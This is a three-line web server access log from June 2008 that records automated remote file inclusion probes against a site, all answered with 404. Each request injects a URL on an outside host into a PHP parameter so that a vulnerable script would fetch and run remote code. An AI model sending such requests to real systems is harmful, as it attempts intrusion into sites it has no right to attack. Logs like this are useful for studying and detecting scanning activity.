205.234.219.245 - - [08/Jun/2008:09:56:27 -0700] "GET //path/comments-display-tpl.php?config[comments_form_tpl]=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.128.131.80 - - [08/Jun/2008:09:56:27 -0700] "GET /logs/index2.php?url_page=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.128.131.80 - - [08/Jun/2008:09:56:27 -0700] "GET /index2.php?url_page=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
